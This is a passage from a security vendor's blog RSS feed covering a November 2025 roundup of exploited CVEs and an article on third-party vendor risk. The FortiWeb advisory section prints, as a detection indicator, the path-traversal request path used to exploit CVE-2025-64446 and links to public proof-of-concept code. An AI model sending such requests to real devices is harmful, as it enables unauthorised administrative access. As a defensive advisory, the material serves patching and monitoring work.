        <p>So what are some practical next steps? First, it’s wise to benchmark your organization’s current program to identify gaps and opportunities. Tools like <a href="https://www.recordedfuture.com/resources/maturity-assessment">Recorded Future’s Threat Intelligence Maturity Assessment</a> provide a structured way to evaluate where you stand today and get tailored recommendations on how to improve.</p>
        <p>With that insight, you can develop a roadmap that includes the right people, process, and technology investments to operationalize threat intelligence in the most efficient way. Keep the big picture in mind: the ultimate aim is to see more threats, identify them faster, and take action to reduce risk before damage is done. With a thoughtful strategy and an eye towards these trends, organizations can chart a course from today’s challenges to a more proactive and resilient threat intelligence function in 2026 and beyond.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_18741ecd2e5bc1f72686d64726aaa4419be1e620f.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[November 2025 CVE Landscape: 10 Critical Vulnerabilities Show 69% Drop from October]]></title>
            <link>https://www.recordedfuture.com/blog/november-2025-cve-landscape</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/november-2025-cve-landscape</guid>
            <pubDate>Tue, 09 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[November 2025 CVE landscape: 10 exploited critical vulnerabilities, a 69% drop from October, and why Fortinet and Samsung flaws need urgent patching.]]></description>
            <content:encoded><![CDATA[
        <p>November 2025 saw a significant 69% decrease in high-impact vulnerabilities, with Recorded Future's Insikt Group® identifying <strong>10 vulnerabilities</strong> requiring immediate attention, <a href="https://www.recordedfuture.com/blog/october-2025-cve-landscape">down from 32 in October</a>.</p>
        <p><strong>What security teams need to know:</strong></p>
        <ul>
          <li><strong>Fortinet leads concerns:</strong> Two critical FortiWeb vulnerabilities (CVE-2025-64446 and CVE-2025-58034) are under active exploitation</li>
          <li><strong>LANDFALL spyware campaign:</strong> Threat actors weaponized Samsung's image processing flaw (CVE-2025-21042) for zero-click Android attacks</li>
          <li><strong>Public exploits proliferate:</strong> Seven of ten vulnerabilities have public proof-of-concept code available</li>
          <li><strong>OS Command Injection and Out-of-bounds Write</strong> were tied as the most common weakness types</li>
        </ul>
        <p><strong>Bottom line:</strong> The reduced volume shouldn't signal reduced vigilance. November's vulnerabilities demonstrate that threat actors favored quality over quantity in their exploitation campaigns.</p>
        <h2>Quick Reference: November 2025 Vulnerability Table</h2>
        <p><em>All 10 vulnerabilities below were actively exploited in November 2025.</em></p>
        <table>
          <thead>
            <tr>
              <th>#</th>
              <th>Vulnerability</th>
              <th>Risk Score</th>
              <th>Affected Vendor/Product</th>
              <th>Vulnerability Type/Component</th>
              <th>Public PoC</th>
            </tr>
          </thead>
          <tbody>
            <tr>
              <td>1</td>
              <td><a href="https://app.recordedfuture.com/portal/intelligence-card/BAWo-07/overview">CVE-2025-12480</a></td>
              <td>99</td>
              <td>Gladinet Triofox</td>
              <td>CWE-284 (Improper Access Control)</td>
              <td>No</td>
            </tr>
            <tr>
              <td>2</td>
              <td><a href="https://app.recordedfuture.com/portal/intelligence-card/BAY-aVO/overview">CVE-2025-62215</a></td>
              <td>99</td>
              <td>Microsoft Windows 10 and 11; Microsoft Windows Server 2019, 2022, and 2025</td>
              <td>CWE-362 (Race Condition), CWE-415 (Double Free)</td>
              <td><a href="https://github.com/search?q=%22CVE-2025-62215%22&amp;type=repositories">Yes</a></td>
            </tr>
            <tr>
              <td>3</td>
              <td><a href="https://app.recordedfuture.com/portal/intelligence-card/BAgNrn4/overview">CVE-2025-64446</a></td>
              <td>99</td>
              <td>Fortinet FortiWeb</td>
              <td>CWE-23 (Relative Path Traversal)</td>
              <td><a href="https://github.com/search?q=CVE-2025-64446&amp;type=repositories">Yes</a></td>
            </tr>
            <tr>
              <td>4</td>
              <td><a href="https://app.recordedfuture.com/portal/intelligence-card/BAnoPpx/overview">CVE-2025-13223</a></td>
              <td>99</td>
              <td>Google Chrome</td>
              <td>CWE-843 (Type Confusion)</td>
              <td>No</td>
            </tr>
            <tr>
              <td>5</td>
              <td><a href="https://app.recordedfuture.com/portal/intelligence-card/BApQp8P/overview">CVE-2025-58034</a></td>
              <td>99</td>
              <td>Fortinet FortiWeb</td>
              <td>CWE-78 (OS Command Injection)</td>
              <td><a href="https://github.com/search?q=CVE-2025-58034&amp;type=repositories">Yes</a></td>
            </tr>
            <tr>
              <td>6</td>
              <td><a href="https://app.recordedfuture.com/portal/intelligence-card/_ob8BJ/overview">CVE-2025-61757</a></td>
              <td>99</td>
              <td>Oracle Identity Manager</td>
              <td>CWE-306 (Missing Authentication for Critical Function)</td>
              <td><a href="https://github.com/search?q=CVE-2025-61757&amp;type=repositories">Yes</a></td>
            </tr>
            <tr>
              <td>7</td>
              <td><a href="https://app.recordedfuture.com/portal/intelligence-card/-R66PT/overview">CVE-2025-9242</a></td>
              <td>99</td>
              <td>WatchGuard Fireware OS</td>
              <td>CWE-787 (Out-of-bounds Write)</td>
              <td><a href="https://github.com/search?q=CVE-2025-9242&amp;type=repositories">Yes</a></td>
            </tr>
            <tr>
              <td>8</td>
              <td><a href="https://app.recordedfuture.com/portal/intelligence-card/-HNHUv/overview">CVE-2025-21042</a></td>
              <td>99</td>
              <td>Samsung Mobile Devices</td>
              <td>CWE-787 (Out-of-bounds Write)</td>
              <td><a href="https://github.com/B1ack4sh/Blackash-CVE-2025-21042">Yes</a></td>
            </tr>
            <tr>
              <td>9</td>
              <td><a href="https://app.recordedfuture.com/portal/intelligence-card/6VoCY0/overview">CVE-2025-48703</a></td>
              <td>99</td>
              <td>CentOS Web Panel</td>
              <td>CWE-78 (OS Command Injection)</td>
              <td><a href="https://github.com/search?q=CVE-2025-48703&amp;type=repositories">Yes</a></td>
            </tr>
            <tr>
              <td>10</td>
              <td><a href="https://app.recordedfuture.com/portal/intelligence-card/iwWgRF/overview">CVE-2021-26829</a></td>
              <td>99</td>
              <td>OpenPLC ScadaBR</td>
              <td>CWE-79 (Improper Neutralization of Input During Web Page Generation [Cross-site Scripting])</td>
              <td>No</td>
            </tr>
          </tbody>
        </table>
        <p><em><strong>Table 1:</strong></em> <em>List of vulnerabilities that were actively exploited in November based on Recorded Future data (Source: Recorded Future)</em></p>
        <h2>Key Trends: November 2025</h2>
        <h3>Vendors Most Affected</h3>
        <ul>
          <li><strong>Fortinet</strong> dominated with two critical FortiWeb vulnerabilities, both enabling remote exploitation</li>
          <li><strong>Microsoft</strong> faced a kernel-level race condition affecting all modern Windows versions</li>
          <li><strong>Samsung</strong> saw the weaponization of an image processing vulnerability for sophisticated mobile attacks</li>
          <li>Additional affected vendors: Gladinet, Google, Oracle, WatchGuard, CentOS, and Autonomy (OpenPLC)</li>
        </ul>
        <h3>Most Common Weakness Types</h3>
        <ul>
          <li><strong>CWE-78</strong> – OS Command Injection (tied for first)</li>
          <li><strong>CWE-787</strong> – Out-of-bounds Write (tied for first)</li>
          <li><strong>CWE-284</strong> – Improper Access Control</li>
          <li><strong>CWE-362</strong> – Race Condition</li>
          <li><strong>CWE-306</strong> – Missing Authentication for Critical Function</li>
        </ul>
        <h3>Threat Actor Activity</h3>
        <p><strong>LANDFALL Android spyware campaign</strong> marked November's most sophisticated operation:</p>
        <ul>
          <li>Exploited <strong>CVE-2025-21042</strong> for zero-click remote code execution on Samsung devices</li>
          <li>Targeted Middle Eastern countries (Iraq, Iran, Turkey, Morocco) with commercial-grade spyware</li>
          <li>Deployed via weaponized DNG image files through WhatsApp</li>
          <li>Achieved persistent device compromise without user interaction</li>
          <li>Demonstrated advanced anti-analysis and SELinux bypass capabilities</li>
        </ul>
        <h2>Priority Alert: Active Exploitation</h2>
        <p>These vulnerabilities demand immediate attention due to confirmed exploitation in the wild.</p>
        <h3>CVE-2025-64446 | Fortinet FortiWeb</h3>
        <p><strong>Risk Score: 99 (Very Critical)</strong> | CISA KEV: Added November 14, 2025</p>
        <p><strong>Why this matters:</strong> Unauthenticated attackers can bypass authentication entirely and create administrative accounts. With 4,768 exposed FortiWeb instances globally, this represents a critical internet-facing risk.</p>
        <p><strong>Affected versions:</strong> FortiWeb 8.0.0-8.0.1, 7.6.0-7.6.4, 7.4.0-7.4.9, 7.2.0-7.2.11, 7.0.0-7.0.11</p>
        <p><strong>Immediate actions:</strong></p>
        <ul>
          <li>Apply Fortinet's security updates (8.0.2, 7.6.5, 7.4.10, 7.2.12, or 7.0.12)</li>
          <li>Monitor for POST requests to <code>/api/v2.0/cmd/system/admin%3F/../../../cgi-bin/fwbcgi</code></li>
          <li>Check for unauthorized admin accounts created since October 2025</li>
          <li>Review logs for Base64-encoded CGIINFO headers</li>
          <li>Disable HTTP/HTTPS on internet-facing interfaces if patching is delayed</li>
        </ul>
        <p><strong>Exposure:</strong> ~4,768 FortiWeb instances visible on Shodan (Netherlands, US, Germany, Italy, Peru)</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_13b330b3e13aad900440407bcd3dde599640b59e9.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="797" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1:</strong></em> <em><a href="https://www.recordedfuture.com/products/vulnerability-intelligence">Vulnerability Intelligence</a></em> <em>Card® for CVE-2025-64446 in Recorded Future (Source: Recorded Future)</em></div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1afc13c5574e9a8966347fe80012616de5d023fd2.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[5 Real-World Third-Party Risk Examples]]></title>
            <link>https://www.recordedfuture.com/blog/third-party-risk-examples</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/third-party-risk-examples</guid>
            <pubDate>Tue, 09 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Explore 5 third-party risk examples, from vendor data breaches to supply chain attacks and learn how third-party risk management can prevent cyberattacks.]]></description>
            <content:encoded><![CDATA[
        <h2>Key Takeaways</h2>
        <ul>
          <li><strong>Static vendor checks fall short:</strong> Traditional, point-in-time third-party risk management practices (e.g. annual questionnaires) leave organizations blind to emerging vendor threats between audits. Continuous monitoring is now a must.</li>
          <li><strong>Five common risk scenarios:</strong> Supply chain attacks, widespread software vulnerabilities, hidden fourth-party dependencies, vendor credential theft, and vendor instability each illustrate how “trusting” vendors can lead to breaches or business disruptions.</li>
          <li><strong>Intelligence-driven defense:</strong> Recorded Future’s platform provides real-time visibility into your vendor ecosystem—from dark web credential leaks to fourth-party relationships—enabling proactive mitigation before incidents impact your organization.</li>
          <li><strong>From trust to verification:</strong> The solution is to move from static trust to continuous verification. By continuously assessing vendors’ cyber and business health (and even integrating intelligence into workflows like ServiceNow), security leaders can vastly strengthen their vendor risk management framework.</li>
        </ul>
        <h2>Your Vendor Ecosystem Is a Black Box: It’s Time to Turn on the Lights</h2>
        <p>For CISOs and risk leaders, the attack surface now goes far beyond the footprint of the business. It’s a sprawling web of SaaS vendors, software suppliers, MSPs, payment processors, logistics partners, and niche fourth parties your vendors rely on. Every connection expands risk—often outside direct visibility. In other words, your security may only be as strong as your weakest vendor or partner.</p>
        <p>Traditional third-party risk management (TPRM)—static security questionnaires and annual audits—cannot keep pace. They describe what a vendor claimed their security looked like months ago, not what it is right now. Meanwhile, the most damaging events (supply chain attacks, zero-day exploitation, credential resale, concentration failures) unfold in hours and days, not quarters.</p>
        <p>This gap between point-in-time paperwork and real-time risk is why third-party exposure has become a primary vector for catastrophic breaches and business outages.</p>
        <p>This article highlights and analyzes 5 real-world third-party risk examples. For each, we'll show why traditional methods fail and how continuous, real-time <a href="https://www.recordedfuture.com/threat-intelligence-101/risk-assessment-management/third-party-risk-management">third-party risk management</a> and threat intelligence are the only effective prevention.</p>
        <h2>5 Third-Party Risk Examples and How to Prevent Them</h2>
        <p>Modern vendor risk comes in many forms. Let’s explore five common scenarios—and how proactive measures can stop them:</p>
        <h3>Type 1: The Software Supply Chain Attack</h3>
        <p><strong>The Scenario:</strong> One of the most damaging third-party risks is a software supply chain attack. This occurs when threat actors breach a trusted software vendor’s development environment and secretly inject malicious code into a legitimate, digitally signed software update. The tainted update, a “Trojan horse,” is then distributed to the vendor’s customers, giving the attacker access into thousands of networks at once.</p>
        <p><strong>Real-World Example:</strong> <a href="https://www.gao.gov/blog/solarwinds-cyberattack-demands-significant-federal-and-private-sector-response-infographic">The SolarWinds Orion breach</a> is a quintessential case. In 2020, nation-state hackers compromised SolarWinds’ build pipeline and inserted malware into an Orion software update. The malicious update, being validly signed, was pushed to around 18,000 customers, including numerous government agencies and Fortune 500 companies, who all gladly installed it, thereby granting the attackers insider access to their systems.</p>
        <p><strong>Why Traditional Methods Fail:</strong> A standard vendor security questionnaire or audit would never have caught this. SolarWinds had passed assessments and appeared reputable. The update itself was digitally signed and appeared “trusted” to antivirus scanners and other controls. In short, you cannot audit your way out of a risk that’s been inserted into a trusted product’s software supply chain.</p>
        <p><strong>The Intelligence-Led Solution:</strong> Preventing a supply chain attack means detecting subtle warning signs before the breach fully unfolds. Recorded Future’s platform continuously monitors for early indicators tied to your vendors. If threat actors known for targeting CI/CD pipelines start discussing or probing one of your software vendors, you’d know. If intelligence suggests a vendor’s code-signing certificate may be compromised, you’d get an alert. Armed with this foresight, you could elevate that vendor’s risk status, scrutinize their software updates more closely, and even hunt for indicators of compromise in your environment before the breach becomes public knowledge.</p>
        <h3>Type 2: The Widespread Third-Party Vulnerability</h3>
        <p><strong>The Scenario:</strong> A critical software vulnerability (often a zero-day) is discovered in a common component that many of your vendors use. It could be an open-source library, a popular IT tool, or a cloud service. You have no direct visibility that your suppliers rely on this component. Attackers quickly develop an exploit and start compromising organizations at scale via this flaw, long before most victims even realize they’re exposed through their third parties.</p>
        <p><strong>Real-World Example:</strong> The <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-158a">MOVEit Transfer zero-day</a> (exploited by the Cl0p ransomware group) and the <a href="https://www.cisa.gov/news-events/news/apache-log4j-vulnerability-guidance">Log4j “Log4Shell” vulnerability</a> are perfect examples of this risk. In the case of MOVEit, a single bug in a widely used file-transfer product led to the mass theft of data from thousands of companies, many of whom weren’t even direct customers of MOVEit, but their vendors were. Similarly, the Log4j flaw impacted countless businesses indirectly because software used by their contractors and providers included the vulnerable library.</p>
        <p><strong>Why Traditional Methods Fail:</strong> This is fundamentally a technology visibility problem. A point-in-time survey asking your vendors “Do you use MOVEit?” is too little, too late. By the time you send out a questionnaire and get a reply (if you get one at all), attackers may have already exploited the vulnerability and exfiltrated data. No organization can manually track every piece of software in their extended vendor ecosystem through periodic check-ins. In the MOVEit incident, many companies had no idea they were at risk until news of data breaches surfaced. Traditional vendor risk management simply isn’t designed to monitor technical exposure in real time.</p>
        <p><strong>The Intelligence-Led Solution:</strong> Defending against widespread vulnerabilities requires connecting two dots instantly: <a href="https://www.recordedfuture.com/threat-intelligence-101/risk-assessment-management/third-party-risk-assessment">what’s vulnerable and who in your supply chain is using it</a>. This is where an intelligence platform shines. Recorded Future’s approach combines technical attack surface intelligence with real-time vulnerability tracking. It continuously scans the internet to map out the external-facing tech stack of your third parties. The moment a new critical vulnerability is disclosed, <a href="https://www.recordedfuture.com/products/third-party-intelligence">Recorded Future’s intelligence</a> automatically checks which of your vendors are running that technology. You receive an immediate, prioritized alert such as: “CRITICAL: 15 of your third-party vendors are exposing servers running [the vulnerable software]. Prompt them to apply patches or mitigations immediately.”</p>
        <h3>Type 3: The Fourth-Party &amp; Concentration Risk</h3>
        <p><strong>The Scenario:</strong> Sometimes the biggest risk in your vendor ecosystem isn’t with your direct third parties, but with their key dependencies. A “fourth party” is a vendor of your vendor, and if one that many of your critical vendors rely on goes down, it can create a single point of failure. A single outage can cascade up the chain, disrupting operations even when direct vendors appear secure.</p>
        <p><strong>Real-World Example:</strong> The <a href="https://www.cisa.gov/news-events/news/kaseya-ransomware-attack-guidance-affected-msps-and-their-customers">2021 ransomware attack on Kaseya’s VSA remote monitoring and management platform</a> is a textbook case. Kaseya primarily served managed service providers (MSPs), who in turn delivered IT services to thousands of downstream customers. When attackers exploited Kaseya VSA, they were effectively able to push ransomware out through those MSPs to many organizations that had no direct relationship with Kaseya at all—they only “knew” their MSP. A single fourth-party dependency became the pivot point for a broad, multi-industry disruption.</p>
        <p><strong>Why Traditional Methods Fail:</strong> If you looked at each of your primary (third-party) vendors in isolation, they all might have passed your security reviews with flying colors. What the traditional assessment missed was that ten of those vendors all relied on the same subcontractor for a critical function: an audit blind spot. Most organizations only discovered their exposure to Kaseya after MSP-delivered systems were already encrypted. Without continuous visibility into your vendors’ vendors, this kind of concentration risk remains invisible until it’s too late.</p>
        <p><strong>The Intelligence-Led Solution:</strong> The only way to manage fourth-party and concentration risk is through continuous mapping of your vendors’ vendors, coupled with dynamic risk scoring. Recorded Future’s Third-Party Intelligence solution automatically identifies and maps these Nth-party relationships throughout your supply chain. In practice, this means if a critical fourth-party suffers a breach, you won’t be finding out via the news days later. Instead, your intelligence dashboard would immediately show that entity’s risk score spiking from, say, a modest 50 to a critical 99. This timely insight gives you a head start to activate business continuity and incident response plans. You immediately know exactly which of your vendors are impacted and can work to contain the fallout.</p>
        <h3>Type 4: The Vendor Credential Compromise</h3>
        <p><strong>The Scenario:</strong> Not all third-party attacks involve sophisticated malware or supply chain tampering. Sometimes hackers just log in through the front door. In this scenario, a threat actor steals valid credentials from one of your vendors and uses those to access your systems. Perhaps an employee at a smaller, “low-risk” vendor, like an HVAC contractor, falls victim to a phishing email or unknowingly runs info-stealer malware on their laptop. Their VPN login or application credentials to your network get quietly harvested and sold on the dark web. An attacker buys the login, bypasses your multi-factor authentication, and walks into your network posing as a legitimate third-party user.</p>
        <p><strong>Real-World Example:</strong> This tactic was at the heart of the high-profile <a href="https://www.bbrown.com/us/insight/a-look-back-at-the-mgm-and-caesars-incident/">2023 breaches of MGM Resorts and Caesars Entertainment</a>, where attackers initially gained access via a third-party IT support vendor’s compromised VPN credentials.</p>
        <p><strong>Why Traditional Methods Fail:</strong> A vendor security questionnaire cannot prevent an individual at a partner company from clicking a phishing link or using a weak password. Your vendor might have all the right policies on paper, but those policies are irrelevant the moment an attacker has a valid username and password in hand. Traditional TPRM programs are about vetting a vendor’s security controls and compliance, but they don’t provide real-time awareness of things like a password leak or dark web sale of access related to that vendor.</p>
        <p><strong>The Intelligence-Led Solution:</strong> The key to stopping a credential-based breach is catching those compromised credentials before they are used against you. This calls for continuous identity-centric intelligence. Recorded Future’s Third-Party Intelligence module includes automated monitoring of a wide range of sources, from dark web forums to infostealer logs and criminal marketplaces, specifically watching for any mention of your organization’s partners and their accounts. The moment a set of credentials associated with one of your vendors appears in an illicit context, you receive a high-priority alert. Your team can immediately revoke or reset that vendor account and investigate the extent of access. This is the definition of proactive defense: you’re effectively shutting the door on the attacker before they can walk through it.</p>
        <h3>Type 5: The Operational &amp; Financial Instability Risk</h3>
        <p><strong>The Scenario:</strong> Sometimes the greatest third-party risk is a vendor’s operational or financial collapse. Consider a scenario where a critical vendor suddenly encounters a non-cyber crisis like bankruptcy, a major lawsuit or regulatory sanction, a natural disaster, or even a geopolitical event that halts their business. From your security team’s perspective everything looked fine, but virtually overnight this partner’s failure threatens to grind your business to a halt.</p>
        <p><strong>Real-World Example:</strong> A headline-grabbing case occurred with the <a href="https://www.law.uw.edu/news-events/news/2023/svb-collapse">sudden collapse of Silicon Valley Bank (SVB)</a> in March 2023. SVB wasn’t attacked by hackers; it suffered a bank run and shut down in a matter of days. Companies that used SVB as a banking partner or for credit found themselves unable to access funds or process payroll, creating a cascade of operational and financial issues.</p>
        <p><strong>Why Traditional Methods Fail:</strong> A standard security questionnaire or compliance-focused vendor review is utterly blind to this category of risk. Your CISO’s third-party risk process likely doesn’t include reviewing a vendor’s financial statements or monitoring news about their executives’ legal troubles—nor should it, in a traditional model, since those are outside the classic IT security scope. As a result, organizations were caught off-guard by SVB’s collapse. A vendor that looked perfectly green from a security control standpoint turned out to be a huge business continuity threat. This kind of event exposes an “edge case” risk that isn’t an edge case at all: vendors can introduce strategic and financial risks that security teams and vendor managers often aren’t tracking.</p>
        <p><strong>The Intelligence-Led Solution:</strong> Truly comprehensive third-party risk management means monitoring all-source intelligence on your vendors, not just cyber indicators. Recorded Future’s Third-Party Intelligence platform is built to ingest and analyze a broad spectrum of data about companies. This includes real-time monitoring of global news media, credit ratings and financial filings, changes in executive leadership, legal filings, sanctions lists, regulatory watchlists, and more. By defining “risk” holistically, the platform can alert you to significant non-cyber events that may impact your vendors. These signals give your security, risk, and procurement teams time to react, whether that means activating contingency plans, finding alternate suppliers, or engaging leadership to address the issue.</p>
        <h2>The Solution: Move from “Trust” to “Continuous Verification”</h2>
        <p>The five examples share a theme: “trust” is not a control. Vendor attestations and annual audits don’t capture rapidly changing third-party conditions—exploits, credentials, dependencies, and financial shocks. This is why third-party risk management matters: it’s no longer a “vendor” problem. It’s your attack surface, your data, and your reputation on the line.</p>
        <p>This is why security leaders are shifting from a trust-but-verify model to a <a href="https://www.recordedfuture.com/threat-intelligence-101/risk-assessment-management/vendor-risk-management-framework">model of continuous verification</a>, replacing blind trust with live intelligence.</p>
        <p>Moving to continuous verification means supplementing or replacing periodic vendor check-ins with real-time intelligence and automation. This is where Recorded Future’s approach comes in. Recorded Future acts as a “risk radar” that’s always on, giving you a 360-degree, real-time view of your third-party ecosystem. It uniquely integrates multiple intelligence streams—threat intelligence, attack surface intelligence, and third-party risk intelligence—into one platform.</p>
        <ul>
          <li>Know which CVEs matter today across your ecosystem with <a href="https://www.recordedfuture.com/products/vulnerability-intelligence">Vulnerability Intelligence</a> and exploit-in-the-wild context.</li>
          <li>Detect compromised vendor access with <a href="https://www.recordedfuture.com/products/identity-intelligence">Identity Intelligence</a> and automated revocation workflows.</li>
          <li>Map fourth-party dependencies and track concentration with <a href="https://www.recordedfuture.com/products/third-party-intelligence">Third-Party Intelligence</a> risk scoring.</li>
          <li>Operationalize all of this via integrations to SIEM/SOAR/EDR and GRC/TPRM workflows (<a href="https://www.recordedfuture.com/blog/servicenow-third-party-risk">e.g., ServiceNow</a>) so that risk evidence triggers action.</li>
        </ul>
        <p>Recorded Future is the only platform connecting disparate, live third-party intelligence into a single, real-time view that answers the question:</p>
        <p><em><strong>“Which of my vendors poses the greatest risk to my business—right now?”</strong></em></p>
        <p>Ready to replace point-in-time vendor questionnaires with continuous verification? Schedule a <a href="https://www.recordedfuture.com/get-started#book-demo">personalized demo</a>, and our experts will show you how the Recorded Future platform provides a complete, real-time picture of your vendor ecosystem.</p>
        <div>
          <div>
            <div>
              <h2>FAQ</h2>
            </div>
          </div>
          <div>
            <div>
              <h3>What is the first step in creating a third-party risk management (TPRM) program?</h3>
              <p>The first step is inventory and categorization. You can't protect what you don't know you have. This involves creating a comprehensive inventory of all your third-party vendors, suppliers, and partners and then categorizing them based on their access to sensitive data and their criticality to your operations (e.g., "high," "medium," "low" risk).</p>
            </div>
          </div>
          <div>
            <div>
              <h3>What is the difference between third-party and fourth-party risk?</h3>
              <p>Third-party risk is the risk posed by your direct vendors (e.g., your SaaS provider, your payroll company). Fourth-party risk (or Nth-party risk) is the risk posed by your vendors' vendors. For example, if your SaaS provider hosts its application on a major cloud platform, that cloud platform is your fourth party. The risk cascades up the supply chain and is often invisible to you without the right intelligence.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>How often should we assess our third-party vendors?</h3>
              <p>High-risk vendors (those with access to critical data or vital to operations) should be assessed at least annually and continuously monitored in real-time. Traditional, "point-in-time" assessments (like questionnaires) are no longer sufficient, as a vendor's security posture can change overnight.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>How does Recorded Future help manage third-party risk more effectively?</h3>
              <p>Recorded Future's Third-Party Intelligence solution moves organizations beyond static, periodic assessments. It provides continuous, real-time intelligence by monitoring all your vendors for critical risk signals—like data breaches, malware infections, exposed credentials, attack surface vulnerabilities, and negative financial news—allowing you to prioritize and act on the most critical vendor risks before they become a breach.</p>
            </div>
          </div>
          <div>
            <div>
              <h3>How can I see risks from my vendors that are part of my own attack surface?</h3>
              <p>This is a critical connection. Recorded Future's Attack Surface Intelligence can be combined with Third-Party Intelligence to identify external-facing assets and vulnerabilities (e.g., services, open ports, vulnerable software) that belong to your third parties but are directly linked to your organization. This helps you understand exactly how a vendor's poor security hygiene directly exposes your own attack surface to an attacker.</p>
            </div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1f932dac2f38bc9bc9592fb26c835aa00e1fe1df1.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
    </channel>
</rss>